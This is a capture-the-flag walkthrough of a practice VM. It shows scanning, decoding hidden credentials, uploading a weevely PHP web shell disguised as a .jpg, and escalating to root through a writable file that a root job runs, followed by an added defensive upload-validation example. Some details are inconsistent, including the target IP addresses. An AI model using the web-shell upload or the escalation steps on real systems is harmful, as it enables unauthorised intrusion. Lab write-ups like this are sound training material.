After setting up the host in VirtualBox, we start by scanning it with Nmap:
nmap -A -T4 -p- 192.168.1.18 -vv

Only port 80 is open, so we fire up the browser to see the webpage.

I downloaded the picture to my Kali machine and used exiftool to see if there was anything useful inside it. I also ran cat on the picture, but there was nothing to find there, so the next step is to run nikto:

As you can see, I found the robots.txt file. It contains 3 locations to visit; the three locations have some pictures, but nothing important about them.
Let's visit the host name itself: /fristi

A login page with username and password. I ran dirb and Burp Suite, but what I found was in the page source: a name to use as the username and a big block of code, which is base64-encoded.


The name is eezeepz; we are going to use it as the login username.
We need to decode this big chunk of code using the base64 command:
cat code_file | base64 --decode > pic.png
file pic.png
Then open the image and take a look at it. It looks like a password to go along with the username eezeepz we found earlier.


Using the username and password took me to a webpage with the ability to upload a file, so let's upload a script to gain a shell.
I used weevely to get a shell with the following commands:
weevely generate 123456 shell.php
Then I changed the name of the file to shell.php.jpg
Upload the file and you will get a page with a message saying the file was uploaded to /uploads
Go back to weevely and paste the link to the file you uploaded:
weevely http://192.168.1.1/fristi/uploads/shell.php.jpg 123456
You will get a shell after that.
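
The upload step above succeeds if the form checks only the final extension of the name, which is an assumption here since the walkthrough does not show the target's code. As an added example (not part of the original walkthrough or the target application), this is a stricter validator in Python; the function names, extension lists and sample bytes are constructed for illustration.

```python
import os
import secrets

# Name segments a script-enabled web server may hand to an interpreter (assumed list).
EXECUTABLE_SEGMENTS = {"php", "php3", "php4", "php5", "php7", "phtml",
                       "phar", "pht", "cgi", "pl", "py", "sh"}

# Allowed image types: final extension -> magic bytes the content must start with.
IMAGE_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Constructed sample inputs (not taken from the target).
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SCRIPT_BYTES = b"<?php /* placeholder script body */ ?>"


def weak_check(filename):
    """The kind of check shell.php.jpg passes: last extension only."""
    return filename.lower().rsplit(".", 1)[-1] in IMAGE_MAGIC


def validate_upload(filename, content):
    """Return (accepted, reason, stored_name); stored_name is None on reject."""
    base = os.path.basename(filename.replace("\\", "/")).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no extension", None
    ext = parts[-1]
    if ext not in IMAGE_MAGIC:
        return False, "extension not allowed", None
    # Check every segment: some server configurations (for example Apache
    # mod_mime with AddHandler) pick a handler from any extension in the name.
    if any(seg in EXECUTABLE_SEGMENTS for seg in parts[1:]):
        return False, "executable extension in name", None
    if not content.startswith(IMAGE_MAGIC[ext]):
        return False, "content does not match extension", None
    # Never reuse the client-supplied name on disk.
    return True, "ok", secrets.token_hex(16) + "." + ext
```

Magic bytes can be prepended to a script, so the upload directory should also be served with script handlers disabled.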

Now we need privilege escalation to gain root access.
Listing the home directories turns up a file, notes.txt, containing instructions on how to run some commands with root privilege.

Running this command will give you access to the admin directory:
echo "/home/admin/chmod -R 7777 /home/admin" > /tmp/runthis
cd /home/admin
ls

cat whoisyourgodnow.txt
We got the flag!!